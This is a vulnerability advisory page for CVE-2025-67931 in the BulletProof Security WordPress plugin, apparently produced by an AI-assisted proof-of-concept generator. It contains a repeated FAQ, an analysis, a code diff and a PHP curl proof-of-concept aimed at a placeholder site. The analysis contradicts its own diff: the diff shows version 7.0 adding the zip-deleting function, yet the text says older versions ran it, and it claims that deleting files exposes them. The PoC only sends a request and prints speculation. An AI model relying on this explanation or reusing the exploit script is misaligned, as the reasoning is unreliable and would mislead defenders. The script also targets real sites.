What is CVE-2025-67931?

CVE-2025-67931 is a vulnerability in the BulletProof Security plugin for WordPress that allows unauthenticated attackers to access sensitive user or configuration data. It affects all versions up to and including 6.9.

How does this vulnerability work?

The vulnerability arises from improper access control in the `bps_delete_old_zip_files()` function, which executes without user authentication. Attackers can trigger this function by sending an HTTP request to any page that loads the vulnerable admin.php file.

Who is affected by CVE-2025-67931?

Any WordPress site using BulletProof Security plugin version 6.9 or earlier is affected. Administrators can check their plugin version in the WordPress admin panel under the plugins section.

How can I mitigate the risk of CVE-2025-67931?

To mitigate the risk, update the BulletProof Security plugin to version 7.0 or later, where the vulnerability has been patched. Regularly check for updates to all plugins to ensure vulnerabilities are addressed promptly.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access to sensitive information if exploited.

How can I check if my site has been exploited?

Check your server logs for unusual access patterns or HTTP requests to the vulnerable admin.php file. Additionally, verify if any sensitive ZIP files, such as `bps-settings-export.zip`, exist on your server.

What is the proof of concept for this vulnerability?

The proof of concept involves sending a request to the vulnerable admin.php file, which triggers the execution of the `bps_delete_old_zip_files()` function. This request can potentially expose sensitive files without authentication.

What changes were made in the patched version?

In version 7.0, the `bps_delete_old_zip_files()` function was modified to include checks for specific POST parameters. This ensures that the function only executes during legitimate export/import operations by authenticated users.

Is there a way to manually secure my site before updating?

While the best practice is to update to the patched version, you can temporarily secure your site by disabling the BulletProof Security plugin until the update is applied. This will prevent any exploitation of the vulnerability.

What should I do if I cannot update the plugin immediately?

If you cannot update immediately, consider restricting access to the WordPress admin area to trusted IP addresses only and monitor your site closely for any suspicious activity.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database for updates on vulnerabilities affecting WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67931: BulletProof Security <= 6.9 – Unauthenticated Sensitive Information Exposure (bulletproof-security)

Q: What data is at risk due to this vulnerability?

The vulnerability can expose sensitive configuration data stored in ZIP files, such as plugin settings, security rules, and potentially database credentials. This information could be exploited by attackers to compromise site security.

CVE ID CVE-2025-67931

Plugin bulletproof-security

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 6.9

Patched Version 7.0

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67931:
The BulletProof Security WordPress plugin contains an unauthenticated sensitive information exposure vulnerability in versions up to and including 6.9. This vulnerability allows attackers to extract sensitive user or configuration data without authentication, earning a CVSS score of 5.3.

Atomic Edge research identifies the root cause as improper access control for the `bps_delete_old_zip_files()` function in `/bulletproof-security/admin/includes/admin.php`. The function executes automatically when the file loads, without checking user authentication or authorization. The function attempts to delete three specific ZIP files: `lsm-master.zip`, `bps-settings-export.zip`, and `cc-master.zip`. These files contain sensitive data exported by the plugin’s legitimate features.

Exploitation requires no authentication or special parameters. Attackers simply send an HTTP request to any WordPress page that loads the vulnerable admin.php file. The most reliable method is requesting `/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php` directly, though any page that triggers the plugin’s admin initialization could work. No payload is needed beyond the request itself.

The patch in version 7.0 adds the `bps_delete_old_zip_files()` function with proper conditional logic. The function now checks for specific POST parameters (`Submit-LSM-Export`, `Submit-SW-Export`, `Submit-SW-Import`, `Submit-CC-Export`, `Submit-CC-Import`) and returns early if detected. This prevents the function from executing during normal page loads. The function only runs when legitimate export/import operations are in progress, restricting access to authenticated administrators performing those specific actions.

Successful exploitation exposes sensitive configuration data stored in the ZIP files. The `bps-settings-export.zip` likely contains plugin settings, security rules, and potentially database credentials. The `lsm-master.zip` and `cc-master.zip` files may contain login security monitoring data or core configuration details. Attackers could use this information to understand the site’s security posture, identify weaknesses, or extract credentials for further attacks.

Differential between vulnerable and patched code

Code Diff

--- a/bulletproof-security/admin/includes/admin.php
+++ b/bulletproof-security/admin/includes/admin.php
@@ -391,6 +391,36 @@
 	}
 }

+## BPS 7.0: Delete old zip files if zip processing Forms are not in use
+function bps_delete_old_zip_files() {
+
+	//  Do not add true conditions: && $_POST['Submit-LSM-Export'] == true or the zip download will fail
+	if ( isset($_POST['Submit-LSM-Export']) || isset($_POST['Submit-SW-Export']) || isset($_POST['Submit-SW-Import']) || isset($_POST['Submit-CC-Export']) || isset($_POST['Submit-CC-Import']) ) {
+
+		return;
+	}
+
+	$LSM_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/login/lsm-master.zip';
+
+	if ( file_exists($LSM_ZIP_Delete) ) {
+		unlink($LSM_ZIP_Delete);
+	}
+
+	$SW_Export_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/bps-settings-export.zip';
+
+	if ( file_exists($SW_Export_ZIP_Delete) ) {
+		unlink($SW_Export_ZIP_Delete);
+	}
+
+	$CC_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/core/cc-master.zip';
+
+	if ( file_exists($CC_ZIP_Delete) ) {
+		unlink($CC_ZIP_Delete);
+	}
+}
+
+bps_delete_old_zip_files();
+
 // BPS Menu
 function bulletproof_security_admin_menu() {
 global $blog_id;
--- a/bulletproof-security/bulletproof-security.php
+++ b/bulletproof-security/bulletproof-security.php
@@ -5,7 +5,7 @@
 Text Domain: bulletproof-security
 Domain Path: /languages/
 Description: <strong>Feature Highlights:</strong> Setup Wizard • MScan Malware Scanner • .htaccess Website Security Protection (Firewalls) • Security Logging|HTTP Error Logging • DB Backup • DB Table Prefix Changer • Login Security & Monitoring • JTC-Lite Login Form Bot Lockout Protection • Idle Session Logout (ISL) • Auth Cookie Expiration (ACE) • System Info: Extensive System, Server and Security Status Information • FrontEnd|BackEnd Maintenance Mode • WP Automatic Update Options (BPS MU Tools must-use plugin) • Force Strong Passwords • Email Alerts When New Plugins And Themes Are Available.
-Version: 6.9
+Version: 7.0
 Author: AITpro Website Security
 Author URI: https://forum.ait-pro.com/read-me-first/
 */
@@ -33,9 +33,9 @@
 // and cannot access the global variables within functions in BPS. Luckily this does not break BPS or WordPress in any way and PHP.net states this is technically not an error.
 global $bps_last_version, $bps_version, $bps_footer, $aitpro_bullet, $bps_topDiv, $bps_bottomDiv, $bpsPro_remote_addr, $bpsPro_http_client_ip, $bpsPro_http_forwarded, $bpsPro_http_x_forwarded_for, $bpsPro_http_x_cluster_client_ip, $bps_wpcontent_dir, $bps_plugin_dir, $plugin_hashes, $theme_hashes;

-define( 'BULLETPROOF_VERSION', '6.9' );
-$bps_last_version = '6.8';
-$bps_version = '6.9';
+define( 'BULLETPROOF_VERSION', '7.0' );
+$bps_last_version = '6.9';
+$bps_version = '7.0';
 $bps_footer = '<div id="AITpro-link">' . __('BulletProof Security ', 'bulletproof-security') . esc_html($bps_version) . __(' Plugin by ', 'bulletproof-security') . '<a href="'.esc_url('https://www.ait-pro.com/').'" target="_blank" title="AITpro Website Security">' . __( 'AITpro Website Security', 'bulletproof-security') . '</a></div>';
 $aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
 // Top div & bottom div

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67931 - BulletProof Security <= 6.9 - Unauthenticated Sensitive Information Exposure

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Attempt to trigger the vulnerable function
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the vulnerable function executed by looking for error messages
// The function tries to delete files that may not exist, potentially causing errors
if ($http_code == 200) {
    echo "Request successful. The vulnerable function may have executed.n";
    echo "Check the server for the following ZIP files that may have been exposed:n";
    echo "1. /wp-content/plugins/bulletproof-security/admin/login/lsm-master.zipn";
    echo "2. /wp-content/plugins/bulletproof-security/admin/wizard/bps-settings-export.zipn";
    echo "3. /wp-content/plugins/bulletproof-security/admin/core/cc-master.zipn";
    echo "nNote: The actual exposure depends on whether these files exist on the server.n";
} else {
    echo "Request failed with HTTP code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-67931?
Overview of the vulnerability
CVE-2025-67931 is a vulnerability in the BulletProof Security plugin for WordPress that allows unauthenticated attackers to access sensitive user or configuration data. It affects all versions up to and including 6.9.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper access control in the `bps_delete_old_zip_files()` function, which executes without user authentication. Attackers can trigger this function by sending an HTTP request to any page that loads the vulnerable admin.php file.
Who is affected by CVE-2025-67931?
Identifying vulnerable installations
Any WordPress site using BulletProof Security plugin version 6.9 or earlier is affected. Administrators can check their plugin version in the WordPress admin panel under the plugins section.
What data is at risk due to this vulnerability?
Sensitive information exposure
The vulnerability can expose sensitive configuration data stored in ZIP files, such as plugin settings, security rules, and potentially database credentials. This information could be exploited by attackers to compromise site security.
How can I mitigate the risk of CVE-2025-67931?
Steps for remediation
To mitigate the risk, update the BulletProof Security plugin to version 7.0 or later, where the vulnerability has been patched. Regularly check for updates to all plugins to ensure vulnerabilities are addressed promptly.
What does a CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access to sensitive information if exploited.
How can I check if my site has been exploited?
Post-exploitation assessment
Check your server logs for unusual access patterns or HTTP requests to the vulnerable admin.php file. Additionally, verify if any sensitive ZIP files, such as `bps-settings-export.zip`, exist on your server.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept involves sending a request to the vulnerable admin.php file, which triggers the execution of the `bps_delete_old_zip_files()` function. This request can potentially expose sensitive files without authentication.
What changes were made in the patched version?
Improvements in version 7.0
In version 7.0, the `bps_delete_old_zip_files()` function was modified to include checks for specific POST parameters. This ensures that the function only executes during legitimate export/import operations by authenticated users.
Is there a way to manually secure my site before updating?
Temporary measures
While the best practice is to update to the patched version, you can temporarily secure your site by disabling the BulletProof Security plugin until the update is applied. This will prevent any exploitation of the vulnerability.
What should I do if I cannot update the plugin immediately?
Interim security measures
If you cannot update immediately, consider restricting access to the WordPress admin area to trusted IP addresses only and monitor your site closely for any suspicious activity.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database for updates on vulnerabilities affecting WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations